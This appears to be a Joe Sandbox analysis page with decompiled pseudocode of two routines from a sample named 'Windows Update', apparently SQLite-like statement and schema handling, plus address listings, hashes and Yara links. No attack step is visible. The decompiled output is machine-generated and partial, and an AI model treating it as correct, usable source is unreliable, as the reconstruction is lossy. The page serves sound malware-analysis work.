                                                                                                                    • Instruction ID: 02b02a13fd2973367a86fa5ad200b25452b678122dc6392e027c5db8bfa3e8a8
                                                                                                                    • Opcode Fuzzy Hash: 7eb748f00a65be4189ce6a5702c696bc42c1b09aab62705d5f830c79dc556e19
                                                                                                                    • Instruction Fuzzy Hash: 2AD1FAB1900785AFDB20DF65C845BAEBBF8AF40304F148469ED09BB742D734EA44CBA1
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0005D687 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 358COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 58%
                                                                                                                    			E0005D687(signed int _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, signed int* _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t125;
				signed int _t127;
				signed int _t129;
				intOrPtr _t134;
				signed int _t140;
				signed int _t142;
				void* _t143;
				signed int _t144;
				signed int _t145;
				signed short _t149;
				signed int _t151;
				signed int _t158;
				signed int _t161;
				signed int _t170;
				signed int _t177;
				intOrPtr _t178;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				intOrPtr _t187;
				signed int _t188;
				signed int _t189;
				intOrPtr* _t191;
				signed int _t192;
				signed int _t195;
				signed int _t196;
				void* _t197;
				void* _t198;
				void* _t200;
				intOrPtr _t207;

				_t195 = _a4;
				_v12 = 0;
				_t177 = E0004E727(_t195, 0x20c);
				_t198 = _t197 + 8;
				_v32 = _t177;
				if(_t177 == 0) {
					_t185 = 7;
					L79:
					if(_t195 == 0 || _t177 == 0 || _t177 <  *((intOrPtr*)(_t195 + 0xe8)) || _t177 >=  *((intOrPtr*)(_t195 + 0xec))) {
						E00027247(_t177);
						_t198 = _t198 + 4;
					} else {
						 *_t177 =  *(_t195 + 0xe4);
						 *((intOrPtr*)(_t195 + 0xdc)) =  *((intOrPtr*)(_t195 + 0xdc)) - 1;
						 *(_t195 + 0xe4) = _t177;
					}
					if(_t195 == 0) {
						__eflags = 0xff;
						return 0x000000ff & _t185;
					} else {
						if( *((char*)(_t195 + 0x1e)) != 0 || _t185 == 0xc0a) {
							_push(0);
							_push(7);
							_push(_t195);
							E000504F7(_t185);
							 *((char*)(_t195 + 0x1e)) = 0;
							_t185 = 7;
						}
						return  *(_t195 + 0x18) & _t185;
					}
				}
				E00077C87(_t177, 0, 0x20c);
				_t186 = 0;
				_t200 = _t198 + 0xc;
				if( *((intOrPtr*)(_t195 + 4)) <= 0) {
					L7:
					_t187 = _a12;
					_t125 = _a8;
					 *_t177 = _t195;
					_t207 = _t187;
					if(_t207 < 0 || _t207 != 0 &&  *((char*)(_t125 + _t187 - 1)) == 0) {
						_t179 =  &_v12;
						L0005EDB7(_t177, _t125,  &_v12);
						_t200 = _t200 + 0xc;
						goto L21;
					} else {
						if(_t187 <=  *((intOrPtr*)(_t195 + 0x4c))) {
							__eflags = _t125;
							if(_t125 == 0) {
								L19:
								 *((intOrPtr*)(_t177 + 0x1dc)) = _t125 + _t187;
								L21:
								__eflags =  *((char*)(_t195 + 0x1e));
								if( *((char*)(_t195 + 0x1e)) != 0) {
									 *(_t177 + 4) = 7;
								}
								__eflags =  *(_t177 + 4) - 0x65;
								if( *(_t177 + 4) == 0x65) {
									 *(_t177 + 4) = 0;
								}
								__eflags =  *((char*)(_t177 + 0x12));
								if(__eflags != 0) {
									_t158 = E00044617(_t177, _t195, __eflags, _t195);
									_t200 = _t200 + 4;
									__eflags = _t158;
									if(_t158 == 0) {
										 *(_t177 + 4) = 0x11;
									}
								}
								__eflags =  *(_t177 + 4) - 0x11;
								if( *(_t177 + 4) == 0x11) {
									E0005E577(_t179, _t195, 0);
									_t200 = _t200 + 8;
								}
								__eflags =  *((char*)(_t195 + 0x1e));
								if( *((char*)(_t195 + 0x1e)) != 0) {
									 *(_t177 + 4) = 7;
								}
								_t180 = _a24;
								__eflags = _t180;
								if(_t180 != 0) {
									 *_t180 =  *((intOrPtr*)(_t177 + 0x1dc));
								}
								_t127 =  *(_t177 + 4);
								_v8 = _t127;
								__eflags = _t127;
								if(_t127 != 0) {
									L60:
									__eflags =  *((char*)(_t195 + 0x78));
									if( *((char*)(_t195 + 0x78)) == 0) {
										_t180 = _a8;
										__eflags =  *((intOrPtr*)(_t177 + 0x1dc)) - _a8;
										E0006F077( *((intOrPtr*)(_t177 + 0x1dc)) - _a8,  *(_t177 + 0xc), _a8,  *((intOrPtr*)(_t177 + 0x1dc)) - _a8, _a16);
										_t200 = _t200 + 0x10;
									}
									_t188 =  *(_t177 + 0xc);
									__eflags = _t188;
									if(_t188 == 0) {
										L71:
										 *_a20 = _t188;
										goto L72;
									} else {
										__eflags = _v8;
										if(_v8 != 0) {
											L65:
											_t134 =  *((intOrPtr*)(_t188 + 0x44));
											__eflags = _t134 - 0xbdf20da3;
											if(__eflags == 0) {
												L69:
												E0006E907(_t180, __eflags, _t188);
												_t200 = _t200 + 4;
												L70:
												E00066BF7(_t177, _t188);
												_t200 = _t200 + 4;
												L72:
												_t129 = _v12;
												_t185 = _v8;
												__eflags = _t129;
												if(_t129 == 0) {
													_push(0);
													_push(_t185);
													_push(_t195);
													E000504F7(_t185);
													_t198 = _t200 + 0xc;
													goto L79;
												}
												E000504F7(_t185, _t195, _t185, 0x470310, _t129);
												_t181 = _v12;
												_t198 = _t200 + 0x10;
												__eflags = _t181 -  *((intOrPtr*)(_t195 + 0xe8));
												if(_t181 <  *((intOrPtr*)(_t195 + 0xe8))) {
													L76:
													E00027247(_t181);
													_t198 = _t198 + 4;
													goto L79;
												}
												__eflags = _t181 -  *((intOrPtr*)(_t195 + 0xec));
												if(_t181 >=  *((intOrPtr*)(_t195 + 0xec))) {
													goto L76;
												}
												 *_t181 =  *(_t195 + 0xe4);
												 *((intOrPtr*)(_t195 + 0xdc)) =  *((intOrPtr*)(_t195 + 0xdc)) - 1;
												 *(_t195 + 0xe4) = _t181;
												goto L79;
											}
											__eflags = _t134 - 0x519c2973;
											if(__eflags == 0) {
												goto L69;
											}
											__eflags = _t134 - 0x26bceaa5;
											if(_t134 == 0x26bceaa5) {
												goto L70;
											}
											goto L72;
										}
										__eflags =  *((char*)(_t195 + 0x1e));
										if( *((char*)(_t195 + 0x1e)) == 0) {
											goto L71;
										}
										goto L65;
									}
								} else {
									_t140 =  *(_t177 + 0xc);
									__eflags = _t140;
									if(_t140 == 0) {
										goto L60;
									}
									_t180 =  *((intOrPtr*)(_t177 + 0x1bc));
									__eflags = _t180;
									if(_t180 == 0) {
										goto L60;
									}
									__eflags = _t180 - 2;
									if(_t180 != 2) {
										L0006EFB7(_t140, 8);
										_t200 = _t200 + 8;
										_t142 = 0;
										__eflags = 0;
										_t180 = 8;
									} else {
										L0006EFB7(_t140, 3);
										_t142 = 8;
										_t200 = _t200 + 8;
										_t53 = _t142 + 3; // 0xb
										_t180 = _t53;
									}
									_v24 = _t180;
									_v20 = _t142;
									__eflags = _t142 - _t180;
									if(_t142 < _t180) {
										_t184 = 0;
										__eflags = 0;
										_v16 = 0;
										_t196 = _t142;
										do {
											_t189 =  *(_t177 + 0xc);
											_t180 =  *(0x472bd4 + _t196 * 4);
											_t143 =  *_t189;
											_v20 = _t180;
											__eflags =  *((char*)(_t143 + 0x1e));
											if( *((char*)(_t143 + 0x1e)) != 0) {
												goto L58;
											}
											_t191 =  *((intOrPtr*)(_t189 + 0x28)) + _t184;
											__eflags = _t180;
											if(_t180 != 0) {
												_t144 =  *(_t191 + 0x10);
												__eflags = _t144;
												if(_t144 == 0) {
													_t145 = 0x3b9aca00;
												} else {
													_t145 =  *(_t144 + 0x48);
												}
												_t178 = 0;
												__eflags = _t145;
												if(_t145 < 0) {
													L53:
													_v28 = 0x202;
													_push(_t191);
													__eflags = 0 - 0x433f60;
													if(0 != 0x433f60) {
														E0006DBA7();
														 *(_t191 + 0x14) = _v20;
														_t149 = 0xa02;
													} else {
														E0006DBA7();
														_t151 = _v20;
														 *(_t191 + 0x14) = _t151;
														 *(_t191 + 0x24) = _t151;
														_t149 = _v28;
													}
													_t184 = _v16;
													 *((intOrPtr*)(_t191 + 0x18)) = _t178;
													_t177 = _v32;
													 *(_t191 + 0x20) = 0;
													_t200 = _t200 + 4;
													 *((short*)(_t191 + 0x1e)) = 0x103;
													L57:
													 *(_t191 + 0x1c) = _t149;
													goto L58;
												} else {
													while(1) {
														__eflags =  *((char*)(_t178 + _t180));
														if( *((char*)(_t178 + _t180)) == 0) {
															goto L53;
														}
														_t178 = _t178 + 1;
														__eflags = _t178 - _t145;
														if(_t178 <= _t145) {
															continue;
														}
														goto L53;
													}
													goto L53;
												}
											}
											__eflags =  *(_t191 + 0x1c) & 0x00000020;
											if(( *(_t191 + 0x1c) & 0x00000020) != 0) {
												E0005EBA7( *_t191);
												_t184 = _v16;
												_t200 = _t200 + 4;
											}
											_t180 = 0xbf01;
											_t149 =  *(_t191 + 0x1c) & 0x0000bf01 | 0x00000001;
											 *((char*)(_t191 + 0x1e)) = 5;
											goto L57;
											L58:
											_t196 = _t196 + 1;
											_t184 = _t184 + 0x28;
											_v16 = _t184;
											__eflags = _t196 - _v24;
										} while (_t196 < _v24);
										_t195 = _a4;
									}
									goto L60;
								}
							}
							_t161 = E0004E727(_t195, _t187 + 1);
							_t200 = _t200 + 8;
							_v16 = _t161;
							__eflags = _t161;
							if(_t161 == 0) {
								_t125 = _a8;
								goto L19;
							}
							E00077337(_t161, _a8, _t187);
							 *((char*)(_v16 + _t187)) = 0;
							_t192 = _v16;
							L0005EDB7(_t177, _t192,  &_v12);
							E0004E6D7(_t195, _t192);
							_t200 = _t200 + 0x20;
							 *((intOrPtr*)(_t177 + 0x1dc)) =  *((intOrPtr*)(_t177 + 0x1dc)) + _a8 - _t192;
							goto L21;
						}
						_push(0x478194);
						_push(0x12);
						_push(_t195);
						E000504F7(_t187);
						_t198 = _t200 + 0xc;
						_t170 = 0x12;
						if( *((char*)(_t195 + 0x1e)) != 0) {
							_push(0);
							_push(7);
							_push(_t195);
							E000504F7(_t187);
							_t198 = _t198 + 0xc;
							 *((char*)(_t195 + 0x1e)) = 0;
							_t170 = 7;
						}
						_t185 =  *(_t195 + 0x18) & _t170;
						goto L79;
					}
				} else {
					_t182 = 0;
					_v16 = 0;
					do {
						_t173 =  *((intOrPtr*)(_t182 +  *((intOrPtr*)(_t195 + 8)) + 4));
						if( *((intOrPtr*)(_t182 +  *((intOrPtr*)(_t195 + 8)) + 4)) == 0) {
							goto L6;
						}
						_t183 = E0004C2F7(_t173);
						_t200 = _t200 + 4;
						_v8 = _t183;
						if(_t183 != 0) {
							E000504F7(_t186 + _t186, _t195, _t183, 0x478174,  *((intOrPtr*)( *((intOrPtr*)(_t195 + 8)) + (_t186 + _t186) * 8)));
							_t185 = _v8;
							_t198 = _t200 + 0x10;
							goto L79;
						}
						_t182 = _v16;
						L6:
						_t186 = _t186 + 1;
						_t182 = _t182 + 0x10;
						_v16 = _t182;
					} while (_t186 <  *((intOrPtr*)(_t195 + 4)));
					goto L7;
				}
			}














































                                                                                                                    0x0005d68f
                                                                                                                    0x0005d699
                                                                                                                    0x0005d6a5
                                                                                                                    0x0005d6a7
                                                                                                                    0x0005d6aa
                                                                                                                    0x0005d6af
                                                                                                                    0x0005da4b
                                                                                                                    0x0005da50
                                                                                                                    0x0005da52
                                                                                                                    0x0005da7f
                                                                                                                    0x0005da84
                                                                                                                    0x0005da68
                                                                                                                    0x0005da6e
                                                                                                                    0x0005da70
                                                                                                                    0x0005da76
                                                                                                                    0x0005da76
                                                                                                                    0x0005da89
                                                                                                                    0x0005dac0
                                                                                                                    0x0005dac8
                                                                                                                    0x0005da8b
                                                                                                                    0x0005da8f
                                                                                                                    0x0005da99
                                                                                                                    0x0005da9b
                                                                                                                    0x0005da9d
                                                                                                                    0x0005da9e
                                                                                                                    0x0005daa6
                                                                                                                    0x0005daaa
                                                                                                                    0x0005daaa
                                                                                                                    0x0005daba
                                                                                                                    0x0005daba
                                                                                                                    0x0005da89
                                                                                                                    0x0005d6bd
                                                                                                                    0x0005d6c2
                                                                                                                    0x0005d6c4
                                                                                                                    0x0005d6ca
                                                                                                                    0x0005d703
                                                                                                                    0x0005d703
                                                                                                                    0x0005d706
                                                                                                                    0x0005d709
                                                                                                                    0x0005d70b
                                                                                                                    0x0005d70d
                                                                                                                    0x0005d7da
                                                                                                                    0x0005d7e0
                                                                                                                    0x0005d7e5
                                                                                                                    0x00000000
                                                                                                                    0x0005d720
                                                                                                                    0x0005d723
                                                                                                                    0x0005d77f
                                                                                                                    0x0005d781
                                                                                                                    0x0005d7d0
                                                                                                                    0x0005d7d2
                                                                                                                    0x0005d7e8
                                                                                                                    0x0005d7e8
                                                                                                                    0x0005d7ec
                                                                                                                    0x0005d7ee
                                                                                                                    0x0005d7ee
                                                                                                                    0x0005d7f5
                                                                                                                    0x0005d7f9
                                                                                                                    0x0005d7fb
                                                                                                                    0x0005d7fb
                                                                                                                    0x0005d802
                                                                                                                    0x0005d806
                                                                                                                    0x0005d809
                                                                                                                    0x0005d80e
                                                                                                                    0x0005d811
                                                                                                                    0x0005d813
                                                                                                                    0x0005d815
                                                                                                                    0x0005d815
                                                                                                                    0x0005d813
                                                                                                                    0x0005d81c
                                                                                                                    0x0005d820
                                                                                                                    0x0005d825
                                                                                                                    0x0005d82a
                                                                                                                    0x0005d82a
                                                                                                                    0x0005d82d
                                                                                                                    0x0005d831
                                                                                                                    0x0005d833
                                                                                                                    0x0005d833
                                                                                                                    0x0005d83a
                                                                                                                    0x0005d83d
                                                                                                                    0x0005d83f
                                                                                                                    0x0005d847
                                                                                                                    0x0005d847
                                                                                                                    0x0005d849
                                                                                                                    0x0005d84c
                                                                                                                    0x0005d84f
                                                                                                                    0x0005d851
                                                                                                                    0x0005d988
                                                                                                                    0x0005d988
                                                                                                                    0x0005d98c
                                                                                                                    0x0005d98e
                                                                                                                    0x0005d99a
                                                                                                                    0x0005d9a1
                                                                                                                    0x0005d9a6
                                                                                                                    0x0005d9a6
                                                                                                                    0x0005d9a9
                                                                                                                    0x0005d9ac
                                                                                                                    0x0005d9ae
                                                                                                                    0x0005d9ea
                                                                                                                    0x0005d9ed
                                                                                                                    0x00000000
                                                                                                                    0x0005d9b0
                                                                                                                    0x0005d9b0
                                                                                                                    0x0005d9b4
                                                                                                                    0x0005d9bc
                                                                                                                    0x0005d9bc
                                                                                                                    0x0005d9bf
                                                                                                                    0x0005d9c4
                                                                                                                    0x0005d9d6
                                                                                                                    0x0005d9d7
                                                                                                                    0x0005d9dc
                                                                                                                    0x0005d9df
                                                                                                                    0x0005d9e0
                                                                                                                    0x0005d9e5
                                                                                                                    0x0005d9ef
                                                                                                                    0x0005d9ef
                                                                                                                    0x0005d9f2
                                                                                                                    0x0005d9f5
                                                                                                                    0x0005d9f7
                                                                                                                    0x0005da3d
                                                                                                                    0x0005da3f
                                                                                                                    0x0005da40
                                                                                                                    0x0005da41
                                                                                                                    0x0005da46
                                                                                                                    0x00000000
                                                                                                                    0x0005da46
                                                                                                                    0x0005da01
                                                                                                                    0x0005da06
                                                                                                                    0x0005da09
                                                                                                                    0x0005da0c
                                                                                                                    0x0005da12
                                                                                                                    0x0005da32
                                                                                                                    0x0005da33
                                                                                                                    0x0005da38
                                                                                                                    0x00000000
                                                                                                                    0x0005da38
                                                                                                                    0x0005da14
                                                                                                                    0x0005da1a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005da22
                                                                                                                    0x0005da24
                                                                                                                    0x0005da2a
                                                                                                                    0x00000000
                                                                                                                    0x0005da2a
                                                                                                                    0x0005d9c6
                                                                                                                    0x0005d9cb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d9cd
                                                                                                                    0x0005d9d2
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d9d4
                                                                                                                    0x0005d9b6
                                                                                                                    0x0005d9ba
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d9ba
                                                                                                                    0x0005d857
                                                                                                                    0x0005d857
                                                                                                                    0x0005d85a
                                                                                                                    0x0005d85c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d862
                                                                                                                    0x0005d868
                                                                                                                    0x0005d86a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d870
                                                                                                                    0x0005d873
                                                                                                                    0x0005d88d
                                                                                                                    0x0005d892
                                                                                                                    0x0005d895
                                                                                                                    0x0005d895
                                                                                                                    0x0005d897
                                                                                                                    0x0005d875
                                                                                                                    0x0005d878
                                                                                                                    0x0005d87d
                                                                                                                    0x0005d882
                                                                                                                    0x0005d885
                                                                                                                    0x0005d885
                                                                                                                    0x0005d885
                                                                                                                    0x0005d89c
                                                                                                                    0x0005d89f
                                                                                                                    0x0005d8a2
                                                                                                                    0x0005d8a4
                                                                                                                    0x0005d8aa
                                                                                                                    0x0005d8aa
                                                                                                                    0x0005d8ac
                                                                                                                    0x0005d8af
                                                                                                                    0x0005d8b7
                                                                                                                    0x0005d8b7
                                                                                                                    0x0005d8ba
                                                                                                                    0x0005d8c1
                                                                                                                    0x0005d8c3
                                                                                                                    0x0005d8c6
                                                                                                                    0x0005d8ca
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d8d3
                                                                                                                    0x0005d8d5
                                                                                                                    0x0005d8d7
                                                                                                                    0x0005d902
                                                                                                                    0x0005d905
                                                                                                                    0x0005d907
                                                                                                                    0x0005d90e
                                                                                                                    0x0005d909
                                                                                                                    0x0005d909
                                                                                                                    0x0005d909
                                                                                                                    0x0005d913
                                                                                                                    0x0005d915
                                                                                                                    0x0005d917
                                                                                                                    0x0005d924
                                                                                                                    0x0005d926
                                                                                                                    0x0005d92d
                                                                                                                    0x0005d92e
                                                                                                                    0x0005d933
                                                                                                                    0x0005d948
                                                                                                                    0x0005d950
                                                                                                                    0x0005d953
                                                                                                                    0x0005d935
                                                                                                                    0x0005d935
                                                                                                                    0x0005d93a
                                                                                                                    0x0005d93d
                                                                                                                    0x0005d940
                                                                                                                    0x0005d943
                                                                                                                    0x0005d943
                                                                                                                    0x0005d958
                                                                                                                    0x0005d95b
                                                                                                                    0x0005d95e
                                                                                                                    0x0005d961
                                                                                                                    0x0005d968
                                                                                                                    0x0005d96b
                                                                                                                    0x0005d971
                                                                                                                    0x0005d971
                                                                                                                    0x00000000
                                                                                                                    0x0005d919
                                                                                                                    0x0005d919
                                                                                                                    0x0005d919
                                                                                                                    0x0005d91d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d91f
                                                                                                                    0x0005d920
                                                                                                                    0x0005d922
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d922
                                                                                                                    0x00000000
                                                                                                                    0x0005d919
                                                                                                                    0x0005d917
                                                                                                                    0x0005d8d9
                                                                                                                    0x0005d8dd
                                                                                                                    0x0005d8e1
                                                                                                                    0x0005d8e6
                                                                                                                    0x0005d8e9
                                                                                                                    0x0005d8e9
                                                                                                                    0x0005d8f0
                                                                                                                    0x0005d8f8
                                                                                                                    0x0005d8fc
                                                                                                                    0x00000000
                                                                                                                    0x0005d975
                                                                                                                    0x0005d975
                                                                                                                    0x0005d976
                                                                                                                    0x0005d979
                                                                                                                    0x0005d97c
                                                                                                                    0x0005d97c
                                                                                                                    0x0005d985
                                                                                                                    0x0005d985
                                                                                                                    0x00000000
                                                                                                                    0x0005d8a4
                                                                                                                    0x0005d851
                                                                                                                    0x0005d788
                                                                                                                    0x0005d78d
                                                                                                                    0x0005d790
                                                                                                                    0x0005d793
                                                                                                                    0x0005d795
                                                                                                                    0x0005d7cd
                                                                                                                    0x00000000
                                                                                                                    0x0005d7cd
                                                                                                                    0x0005d79c
                                                                                                                    0x0005d7a4
                                                                                                                    0x0005d7a8
                                                                                                                    0x0005d7b1
                                                                                                                    0x0005d7b8
                                                                                                                    0x0005d7c2
                                                                                                                    0x0005d7c5
                                                                                                                    0x00000000
                                                                                                                    0x0005d7c5
                                                                                                                    0x0005d725
                                                                                                                    0x0005d72a
                                                                                                                    0x0005d72c
                                                                                                                    0x0005d72d
                                                                                                                    0x0005d732
                                                                                                                    0x0005d739
                                                                                                                    0x0005d73e
                                                                                                                    0x0005d740
                                                                                                                    0x0005d742
                                                                                                                    0x0005d744
                                                                                                                    0x0005d745
                                                                                                                    0x0005d74a
                                                                                                                    0x0005d74d
                                                                                                                    0x0005d751
                                                                                                                    0x0005d751
                                                                                                                    0x0005d759
                                                                                                                    0x00000000
                                                                                                                    0x0005d759
                                                                                                                    0x0005d6cc
                                                                                                                    0x0005d6cc
                                                                                                                    0x0005d6ce
                                                                                                                    0x0005d6d7
                                                                                                                    0x0005d6da
                                                                                                                    0x0005d6e0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0005d6e8
                                                                                                                    0x0005d6ea
                                                                                                                    0x0005d6ed
                                                                                                                    0x0005d6f2
                                                                                                                    0x0005d76f
                                                                                                                    0x0005d774
                                                                                                                    0x0005d777
                                                                                                                    0x00000000
                                                                                                                    0x0005d777
                                                                                                                    0x0005d6f4
                                                                                                                    0x0005d6f7
                                                                                                                    0x0005d6f7
                                                                                                                    0x0005d6f8
                                                                                                                    0x0005d6fb
                                                                                                                    0x0005d6fe
                                                                                                                    0x00000000
                                                                                                                    0x0005d6d7

                                                                                                                    APIs
                                                                                                                    • _memset.LIBCMT ref: 0005D6BD
                                                                                                                    • _memmove.LIBCMT ref: 0005D79C
                                                                                                                      • Part of subcall function 0006EFB7: _memset.LIBCMT ref: 0006F037
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.301202133.0000000000012000.00000002.00000001.01000000.00000007.sdmp, Offset: 00010000, based on PE: true
                                                                                                                    • Associated: 00000004.00000002.301191899.0000000000010000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_10000_Windows Update.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: _memset$_memmove
                                                                                                                    • String ID: `?C
                                                                                                                    • API String ID: 2532777613-10299428
                                                                                                                    • Opcode ID: 0768126f05df1d33f4908a53b53d999d03d70249aa0c6b8790922ed04c39da5d
                                                                                                                    • Instruction ID: bda896be97cddff6508a051bb4646e8ba8a061d0535cb83a7862590fa6da4dd0
                                                                                                                    • Opcode Fuzzy Hash: 0768126f05df1d33f4908a53b53d999d03d70249aa0c6b8790922ed04c39da5d
                                                                                                                    • Instruction Fuzzy Hash: 88D1C5B1A04245ABDB30DF64C845BAFB7F4EF41305F14846BEC499B242E735E949CBA2
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00057267 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 302COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 79%
                                                                                                                    			E00057267(char _a4, signed short _a8, intOrPtr _a12) {
				signed int _v8;
				signed char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				char* _v60;
				signed int _v64;
				intOrPtr _v68;
				signed short _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t141;
				void* _t148;
				signed int _t150;
				signed int _t156;
				signed int _t163;
				intOrPtr _t168;
				intOrPtr _t173;
				signed int _t176;
				intOrPtr _t179;
				signed int _t186;
				intOrPtr _t195;
				signed int _t202;
				intOrPtr _t203;
				void* _t204;
				signed int _t205;
				signed int _t206;
				intOrPtr _t207;
				signed char _t213;
				intOrPtr _t215;
				char _t216;
				char _t224;
				signed short _t225;
				void* _t227;
				signed int _t228;
				void* _t230;
				signed int _t232;
				void* _t233;
				void* _t234;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;

				_v8 =  *0x481f80 ^ _t232;
				_t207 = _a12;
				_t230 = _a4;
				_t225 = _a8;
				_v52 = _t230;
				_v40 = _t225;
				_v56 = _t207;
				if(_t225 != 1) {
					_t141 = 0x472428;
					_t224 = 0x4767d0;
				} else {
					_t141 = 0x472490;
					_t224 = 0x4767bc;
				}
				_v16 = _t141;
				_push(0);
				_v48 = _t224;
				_v24 = _t224;
				_v20 = 0x475844;
				_v12 = 0;
				_v76 = _t230;
				_v72 = _t225;
				_v64 = 0;
				_v68 = _t207;
				E000570A7( &_v76, 3,  &_v24);
				_t202 = _v64;
				_t234 = _t233 + 0x10;
				if(_t202 != 0) {
					L25:
					__eflags = _t202 - 7;
					if(_t202 == 7) {
						goto L57;
					} else {
						__eflags = _t202 - 0xc0a;
						if(_t202 == 0xc0a) {
							goto L57;
						}
					}
					goto L58;
				} else {
					_v32 = _t225 << 4;
					_t148 = E00053C67(_t230, _v48,  *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + (_t225 << 4))));
					_t235 = _t234 + 0xc;
					if(_t148 != 0) {
						 *(_t148 + 0x22) =  *(_t148 + 0x22) | 0x00000001;
					}
					_t203 =  *((intOrPtr*)(_t230 + 8));
					_v36 = _t203;
					if( *((intOrPtr*)(_t203 + _v32 + 4)) != 0) {
						_t150 = E000591B7(0xd8);
						_t236 = _t235 + 4;
						_v44 = _t150;
						__eflags = _t150;
						if(_t150 == 0) {
							_t202 = 7;
							L57:
							 *((char*)(_t230 + 0x1e)) = 1;
						} else {
							E00077C87(_t150, 0, 0xd8);
							L00049DF7( *((intOrPtr*)(_t203 + _v32 + 4)));
							_t204 = E000499B7(__eflags,  *((intOrPtr*)(_t203 + _v32 + 4)), 1, 0, 0, _v44);
							_t237 = _t236 + 0x24;
							__eflags = _t204 - 0x10;
							_t202 =  ==  ? 0 : _t204;
							_t227 = 0;
							__eflags = _t202;
							if(_t202 != 0) {
								L15:
								_t156 = _t202 & 0x000000ff;
								__eflags = _t156 - 0x1a;
								if(__eflags > 0) {
									L17:
									_t157 = 0x478e40;
								} else {
									_t157 =  *(0x475478 + _t156 * 4);
									__eflags =  *(0x475478 + _t156 * 4);
									if(__eflags == 0) {
										goto L17;
									}
								}
								E00061157(__eflags, _v56, _t230, 0x470310, _t157);
								_t238 = _t237 + 0x10;
								goto L19;
							} else {
								_t165 =  &_v28;
								_v60 =  &_v28;
								while(1) {
									__eflags = _t227 - 5;
									if(_t227 >= 5) {
										break;
									}
									_t227 = _t227 + 1;
									_t202 = E0004A177(_v32,  *((intOrPtr*)(_v36 + _v32 + 4)), _t227, _t165);
									_t165 = _v60 + 4;
									_t237 = _t237 + 0xc;
									_v60 = _v60 + 4;
									__eflags = _t202;
									if(_t202 == 0) {
										continue;
									} else {
										goto L15;
									}
									goto L20;
								}
								__eflags = _t202;
								if(_t202 != 0) {
									goto L15;
								} else {
									_t224 = _v36;
									_t228 = _v32;
									_t205 = _v40;
									 *((intOrPtr*)( *((intOrPtr*)(_t224 + _t228 + 0xc)))) = _v28;
									_t213 = _v12;
									__eflags = _t213;
									if(_t213 == 0) {
										_t168 =  *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + _t228 + 0xc));
										_t84 = _t168 + 0x3a;
										 *_t84 =  *(_t168 + 0x3a) | 0x00000004;
										__eflags =  *_t84;
										goto L36;
									} else {
										__eflags = _t205;
										if(_t205 != 0) {
											__eflags = _t213 - ( *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + 0xc)) + 0x39) & 0x000000ff);
											if(__eflags == 0) {
												goto L36;
											} else {
												_push(0x477218);
												goto L34;
											}
										} else {
											_t220 =  ==  ? 1 : _t213 & 3;
											 *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + 0xc)) + 0x39) =  ==  ? 1 : _t213 & 3;
											_t195 = E00037147(_t230, 0x47812c, _t205);
											_t224 = _v36;
											_t237 = _t237 + 0xc;
											 *((intOrPtr*)(_t230 + 0x2c)) = _t195;
											L36:
											 *((char*)( *((intOrPtr*)(_t224 + _t228 + 0xc)) + 0x39)) =  *( *((intOrPtr*)( *((intOrPtr*)(_t230 + 8)) + 0xc)) + 0x39);
											_t215 =  *((intOrPtr*)(_t224 + _t228 + 0xc));
											__eflags =  *(_t215 + 0x3c);
											if( *(_t215 + 0x3c) == 0) {
												_t95 =  &_v20; // 0x475844
												_t186 =  *_t95;
												__eflags = _t186;
												if(__eflags != 0) {
													if(__eflags < 0) {
														_t186 =  ~_t186;
													}
												} else {
													_t186 = 0x7d0;
												}
												 *(_t215 + 0x3c) = _t186;
												E0004C3F7( *((intOrPtr*)(_t224 + _t228 + 4)),  *((intOrPtr*)( *((intOrPtr*)(_t224 + _t228 + 0xc)) + 0x3c)));
												_t224 = _v36;
												_t237 = _t237 + 8;
											}
											_t216 = _v24;
											 *((char*)( *((intOrPtr*)(_t224 + _t228 + 0xc)) + 0x38)) = _t216;
											_t173 =  *((intOrPtr*)(_t224 + _t228 + 0xc));
											__eflags =  *((char*)(_t173 + 0x38));
											if( *((char*)(_t173 + 0x38)) == 0) {
												 *((char*)(_t173 + 0x38)) = 1;
											}
											__eflags =  *((char*)( *((intOrPtr*)(_t224 + _t228 + 0xc)) + 0x38)) - 4;
											if(__eflags <= 0) {
												__eflags = _t205;
